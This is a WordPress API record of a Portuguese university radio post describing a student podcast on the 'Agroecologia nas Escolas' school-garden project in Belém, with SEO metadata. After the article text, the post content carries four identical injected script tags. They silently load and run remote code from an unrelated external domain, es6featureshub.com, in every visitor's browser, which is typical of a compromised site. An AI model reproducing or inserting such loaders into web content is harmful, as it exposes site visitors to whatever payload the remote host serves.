{"id":10693,"date":"2022-06-07T16:04:08","date_gmt":"2022-06-07T19:04:08","guid":{"rendered":"http:\/\/radio.ufpa.br\/?p=10693"},"modified":"2025-10-21T13:14:36","modified_gmt":"2025-10-21T16:14:36","slug":"agroecologia-nas-escolas","status":"publish","type":"post","link":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/agroecologia-nas-escolas\/","title":{"rendered":"Agroecologia nas Escolas"},"content":{"rendered":"<!--[if lt IE 9]><script>document.createElement('audio');<\/script><![endif]-->\n\t<div class=\"wp-playlist wp-audio-playlist wp-playlist-light\">\n\t\t\t<div class=\"wp-playlist-current-item\"><\/div>\n\t\t<audio controls=\"controls\" preload=\"none\" width=\"1178\"\n\t\t\t><\/audio>\n\t<div class=\"wp-playlist-next\"><\/div>\n\t<div class=\"wp-playlist-prev\"><\/div>\n\t<noscript>\n\t<ol>\n\t\t<li><a href='https:\/\/radio.ufpa.br\/wp-content\/uploads\/2022\/06\/ESPACO-EXPERIMENTAL-AGROECOLOGIA-NAS-ESCOLAS-2022-4.mp3'>Espa\u00e7o Experimental - Agroecologia nas Escolas<\/a><\/li>\t<\/ol>\n\t<\/noscript>\n\t<script type=\"application\/json\" class=\"wp-playlist-script\">{\"type\":\"audio\",\"tracklist\":true,\"tracknumbers\":true,\"images\":true,\"artists\":true,\"tracks\":[{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-content\\\/uploads\\\/2022\\\/06\\\/ESPACO-EXPERIMENTAL-AGROECOLOGIA-NAS-ESCOLAS-2022-4.mp3\",\"type\":\"audio\\\/mpeg\",\"title\":\"Espa\\u00e7o Experimental - Agroecologia nas Escolas\",\"caption\":\"\",\"description\":\"\\\"ESPA\\u00c7O EXPERIMENTAL - AGROECOLOGIA NAS ESCOLAS - 2022\\\". G\\u00eanero: Other.\",\"meta\":{\"artist\":\"R\\u00e1dio Web UFPA\",\"album\":\"Espa\\u00e7o Experimental\",\"genre\":\"Other\",\"length_formatted\":\"18:15\"},\"image\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64},\"thumb\":{\"src\":\"https:\\\/\\\/radio.ufpa.br\\\/wp-includes\\\/images\\\/media\\\/audio.svg\",\"width\":48,\"height\":64}}]}<\/script>\n<\/div>\n\t\n\n\n<p>Agroecologia nas Escolas \u00e9 o tema do podcast em destaque nesta edi\u00e7\u00e3o do <a href=\"https:\/\/radio.ufpa.br\/index.php\/category\/espaco-experimental\/\" target=\"_blank\" rel=\"noreferrer noopener\">Espa\u00e7o Experimenta<\/a>l. O trabalho foi produzido para a disciplina de Extens\u00e3o, Comunica\u00e7\u00e3o e Interven\u00e7\u00e3o Social, do curso de Bacharelado em Desenvolvimento Rural da UFPA.<\/p>\n\n\n\n<p>Al\u00e9m das metodologias do projeto Agroecologia nas Escolas, o podcast destaca os desafios do acesso \u00e0 alimenta\u00e7\u00e3o saud\u00e1vel, as alternativas para a sa\u00edda dessa crise e a relev\u00e2ncia da agroecologia na sociedade. Em entrevista aos realizadores do produto midi\u00e1tico, o t\u00e9cnico-administrativo Moacir Pereira, do <a href=\"https:\/\/www.ineaf.ufpa.br\/\" target=\"_blank\" rel=\"noreferrer noopener\">Instituto Amaz\u00f4nico de Agriculturas Familiares (INEAF),<\/a> detalha a import\u00e2ncia da agroecologia no meio social rural e, tamb\u00e9m, urbano.<\/p>\n\n\n\n<p>Mestre em Ci\u00eancias Ambientais e coordenador do Agroecologia nas Escolas, o professor Moacir conta ainda que o projeto, criado em 2020, \u00e9 realizado em uma escola p\u00fablica localizada no bairro da Marambaia, em Bel\u00e9m. O objetivo \u00e9 dividir as experi\u00eancias das pr\u00e1ticas agroecol\u00f3gicas na horta escolar e do jardim ecol\u00f3gico implementados no local, seguindo os par\u00e2metros da educa\u00e7\u00e3o ambiental.<\/p>\n\n\n\n<p>Assim, o projeto de extens\u00e3o do INEAF atua diretamente na constru\u00e7\u00e3o de um olhar cr\u00edtico a respeito da rela\u00e7\u00e3o sociedade-natureza, al\u00e9m de propor mudan\u00e7as de h\u00e1bitos na comunidade. \u201cN\u00e3o \u00e9 simplesmente uma horta, n\u00e3o \u00e9 simplesmente um paisagismo, \u00e9 mais do que isso. \u00c9 voc\u00ea pensar porque \u00e9 importante ter isso em uma escola. E a partir disso, os professores come\u00e7am a repensar o papel da educa\u00e7\u00e3o e da comunidade escolar\u201d, afirma Moacir.<\/p>\n\n\n\n<p>Para o professor, a agroecologia \u00e9 uma a\u00e7\u00e3o pol\u00edtica, uma ci\u00eancia e uma pr\u00e1tica. Ela se prop\u00f5e a integrar a \u00e1rea urbana para formar consumidores &#8211; uma rede de pessoas que saibam o que \u00e9 a agroecologia &#8211; e que entendam a import\u00e2ncia de consumir produtos da agricultura familiar. O professor ressalta que o meio urbano tamb\u00e9m tem um potencial de produ\u00e7\u00e3o agr\u00edcola, como \u00e9 o caso das ilhas espalhadas pela regi\u00e3o.<\/p>\n\n\n\n<p>Evidenciando como o projeto pode mudar os comportamentos sociais, os alunos que participam do programa agroecol\u00f3gico come\u00e7aram a pesquisar os cuidados e o cultivo das plantas e a acessar uma alimenta\u00e7\u00e3o sem agrot\u00f3xicos. A comunidade local tamb\u00e9m participa do projeto levando plantas comest\u00edveis e medicinais como meio de integrar os estudos, promovendo o fortalecimento das rela\u00e7\u00f5es hist\u00f3ricas e de conhecimento.<\/p>\n\n\n\n<p>Al\u00e9m das a\u00e7\u00f5es internas, o Agroecologia nas Escolas est\u00e1 aberto a volunt\u00e1rios e conta com reuni\u00f5es livres ao p\u00fablico, toda sexta-feira, \u00e0s 9h da manh\u00e3.<\/p>\n\n\n\n<p>O podcast sobre o projeto Agroecologia nas Escolas \u00e9 uma produ\u00e7\u00e3o da turma de Extens\u00e3o, Comunica\u00e7\u00e3o e Interven\u00e7\u00e3o Social, do INEAF\/UFPA, com a participa\u00e7\u00e3o dos alunos C\u00e1ssio Ribeiro, In\u00e1 Souto, Giovani Moraes, Lucas Piedade e J\u00e9ssica Gouvea, coordenado pela professora Monique Medeiros.<\/p>\n\n\n\n<p>Para acompanhar o podcast e ficar por dentro desses trabalhos e projetos de sustentabilidade, cidadania e ecologia, n\u00e3o perca esta edi\u00e7\u00e3o do Espa\u00e7o Experimental. O programa vai ao ar ter\u00e7a-feira, \u00e0s 11h, com reprise quinta-feira, \u00e0s 20h. <\/p>\n\n\n\n<p>Reportagem: Giovanna Martini<\/p>\n\n\n\n<p>Imagem: <a href=\"https:\/\/www2.ufjf.br\/noticias\/2021\/12\/13\/grupo-de-estudo-ambiental-lanca-livro-sobre-agroecologia-escolar\/\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/www2.ufjf.br\/noticias\/2021\/12\/13\/grupo-de-estudo-ambiental-lanca-livro-sobre-agroecologia-escolar\/<\/a><\/p>\n<script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script>","protected":false},"excerpt":{"rendered":"<p> &#8230; <a title=\"Agroecologia nas Escolas\" class=\"read-more\" href=\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/agroecologia-nas-escolas\/\" aria-label=\"Read more about Agroecologia nas Escolas\">Ler mais<\/a><\/p>\n","protected":false},"author":6,"featured_media":10748,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_exactmetrics_skip_tracking":false,"_exactmetrics_sitenote_active":false,"_exactmetrics_sitenote_note":"","_exactmetrics_sitenote_category":0,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","enabled":false},"version":2}},"categories":[161],"tags":[],"class_list":["post-10693","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-espaco-experimental"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.1 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Agroecologia nas Escolas - Radio Web UFPA<\/title>\n<meta name=\"description\" content=\"Agroecologia nas Escolas \u00e9 o tema do podcast produzido por alunos do curso de Bacharelado em Desenvolvimento Rural da UFPA.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/agroecologia-nas-escolas\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Agroecologia nas Escolas - Radio Web UFPA\" \/>\n<meta property=\"og:description\" content=\"Agroecologia nas Escolas \u00e9 o tema do podcast produzido por alunos do curso de Bacharelado em Desenvolvimento Rural da UFPA.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/agroecologia-nas-escolas\/\" \/>\n<meta property=\"og:site_name\" content=\"Radio Web UFPA\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/radiowebufpa\" \/>\n<meta property=\"article:published_time\" content=\"2022-06-07T19:04:08+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-10-21T16:14:36+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/06\/mutiro_agroecologia_ufjf_08102016_foto_clara-1-e1639400451176.jpg?fit=640%2C371&ssl=1\" \/>\n\t<meta property=\"og:image:width\" content=\"640\" \/>\n\t<meta property=\"og:image:height\" content=\"371\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Elissandra Batista\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:site\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Elissandra Batista\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/agroecologia-nas-escolas\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/agroecologia-nas-escolas\/\"},\"author\":{\"name\":\"Elissandra Batista\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6\"},\"headline\":\"Agroecologia nas Escolas\",\"datePublished\":\"2022-06-07T19:04:08+00:00\",\"dateModified\":\"2025-10-21T16:14:36+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/agroecologia-nas-escolas\/\"},\"wordCount\":538,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/agroecologia-nas-escolas\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/06\/mutiro_agroecologia_ufjf_08102016_foto_clara-1-e1639400451176.jpg?fit=640%2C371&ssl=1\",\"articleSection\":[\"Espa\u00e7o Experimental\"],\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/agroecologia-nas-escolas\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/agroecologia-nas-escolas\/\",\"url\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/agroecologia-nas-escolas\/\",\"name\":\"Agroecologia nas Escolas - Radio Web UFPA\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/agroecologia-nas-escolas\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/agroecologia-nas-escolas\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/06\/mutiro_agroecologia_ufjf_08102016_foto_clara-1-e1639400451176.jpg?fit=640%2C371&ssl=1\",\"datePublished\":\"2022-06-07T19:04:08+00:00\",\"dateModified\":\"2025-10-21T16:14:36+00:00\",\"description\":\"Agroecologia nas Escolas \u00e9 o tema do podcast produzido por alunos do curso de Bacharelado em Desenvolvimento Rural da UFPA.\",\"breadcrumb\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/agroecologia-nas-escolas\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/agroecologia-nas-escolas\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/agroecologia-nas-escolas\/#primaryimage\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/06\/mutiro_agroecologia_ufjf_08102016_foto_clara-1-e1639400451176.jpg?fit=640%2C371&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/06\/mutiro_agroecologia_ufjf_08102016_foto_clara-1-e1639400451176.jpg?fit=640%2C371&ssl=1\",\"width\":640,\"height\":371,\"caption\":\"Agroecologia nas Escolas\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/agroecologia-nas-escolas\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/radio.ufpa.br\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Agroecologia nas Escolas\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/radio.ufpa.br\/#website\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"name\":\"Radio Web UFPA\",\"description\":\"Divulgando o conhecimento\",\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/radio.ufpa.br\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/radio.ufpa.br\/#organization\",\"name\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1\",\"width\":417,\"height\":121,\"caption\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/radiowebufpa\",\"https:\/\/x.com\/radiowebufpa\",\"https:\/\/www.instagram.com\/radiowebufpa\/\",\"https:\/\/www.youtube.com\/user\/RadioWebUFP4\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6\",\"name\":\"Elissandra Batista\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g\",\"caption\":\"Elissandra Batista\"},\"url\":\"https:\/\/radio.ufpa.br\/index.php\/author\/elissandra\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Agroecologia nas Escolas - Radio Web UFPA","description":"Agroecologia nas Escolas \u00e9 o tema do podcast produzido por alunos do curso de Bacharelado em Desenvolvimento Rural da UFPA.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/agroecologia-nas-escolas\/","og_locale":"pt_BR","og_type":"article","og_title":"Agroecologia nas Escolas - Radio Web UFPA","og_description":"Agroecologia nas Escolas \u00e9 o tema do podcast produzido por alunos do curso de Bacharelado em Desenvolvimento Rural da UFPA.","og_url":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/agroecologia-nas-escolas\/","og_site_name":"Radio Web UFPA","article_publisher":"https:\/\/www.facebook.com\/radiowebufpa","article_published_time":"2022-06-07T19:04:08+00:00","article_modified_time":"2025-10-21T16:14:36+00:00","og_image":[{"width":640,"height":371,"url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/06\/mutiro_agroecologia_ufjf_08102016_foto_clara-1-e1639400451176.jpg?fit=640%2C371&ssl=1","type":"image\/jpeg"}],"author":"Elissandra Batista","twitter_card":"summary_large_image","twitter_creator":"@radiowebufpa","twitter_site":"@radiowebufpa","twitter_misc":{"Escrito por":"Elissandra Batista","Est. tempo de leitura":"3 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/agroecologia-nas-escolas\/#article","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/agroecologia-nas-escolas\/"},"author":{"name":"Elissandra Batista","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6"},"headline":"Agroecologia nas Escolas","datePublished":"2022-06-07T19:04:08+00:00","dateModified":"2025-10-21T16:14:36+00:00","mainEntityOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/agroecologia-nas-escolas\/"},"wordCount":538,"commentCount":0,"publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/agroecologia-nas-escolas\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/06\/mutiro_agroecologia_ufjf_08102016_foto_clara-1-e1639400451176.jpg?fit=640%2C371&ssl=1","articleSection":["Espa\u00e7o Experimental"],"inLanguage":"pt-BR","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/agroecologia-nas-escolas\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/agroecologia-nas-escolas\/","url":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/agroecologia-nas-escolas\/","name":"Agroecologia nas Escolas - Radio Web UFPA","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/#website"},"primaryImageOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/agroecologia-nas-escolas\/#primaryimage"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/agroecologia-nas-escolas\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/06\/mutiro_agroecologia_ufjf_08102016_foto_clara-1-e1639400451176.jpg?fit=640%2C371&ssl=1","datePublished":"2022-06-07T19:04:08+00:00","dateModified":"2025-10-21T16:14:36+00:00","description":"Agroecologia nas Escolas \u00e9 o tema do podcast produzido por alunos do curso de Bacharelado em Desenvolvimento Rural da UFPA.","breadcrumb":{"@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/agroecologia-nas-escolas\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/agroecologia-nas-escolas\/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/agroecologia-nas-escolas\/#primaryimage","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/06\/mutiro_agroecologia_ufjf_08102016_foto_clara-1-e1639400451176.jpg?fit=640%2C371&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/06\/mutiro_agroecologia_ufjf_08102016_foto_clara-1-e1639400451176.jpg?fit=640%2C371&ssl=1","width":640,"height":371,"caption":"Agroecologia nas Escolas"},{"@type":"BreadcrumbList","@id":"https:\/\/radio.ufpa.br\/index.php\/espaco-experimental\/agroecologia-nas-escolas\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/radio.ufpa.br\/"},{"@type":"ListItem","position":2,"name":"Agroecologia nas Escolas"}]},{"@type":"WebSite","@id":"https:\/\/radio.ufpa.br\/#website","url":"https:\/\/radio.ufpa.br\/","name":"Radio Web UFPA","description":"Divulgando o conhecimento","publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/radio.ufpa.br\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"},{"@type":"Organization","@id":"https:\/\/radio.ufpa.br\/#organization","name":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA","url":"https:\/\/radio.ufpa.br\/","logo":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1","width":417,"height":121,"caption":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA"},"image":{"@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/radiowebufpa","https:\/\/x.com\/radiowebufpa","https:\/\/www.instagram.com\/radiowebufpa\/","https:\/\/www.youtube.com\/user\/RadioWebUFP4"]},{"@type":"Person","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/51774ebb30a3903e2bf07acf94e8fea6","name":"Elissandra Batista","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/b779d46516fe39b809059134270ec707?s=96&d=mm&r=g","caption":"Elissandra Batista"},"url":"https:\/\/radio.ufpa.br\/index.php\/author\/elissandra\/"}]}},"jetpack_publicize_connections":[],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2022\/06\/mutiro_agroecologia_ufjf_08102016_foto_clara-1-e1639400451176.jpg?fit=640%2C371&ssl=1","jetpack_shortlink":"https:\/\/wp.me\/p8TJeA-2Mt","jetpack_likes_enabled":true,"jetpack-related-posts":[],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/10693","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/users\/6"}],"replies":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/comments?post=10693"}],"version-history":[{"count":16,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/10693\/revisions"}],"predecessor-version":[{"id":17868,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/10693\/revisions\/17868"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media\/10748"}],"wp:attachment":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media?parent=10693"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/categories?post=10693"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/tags?post=10693"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}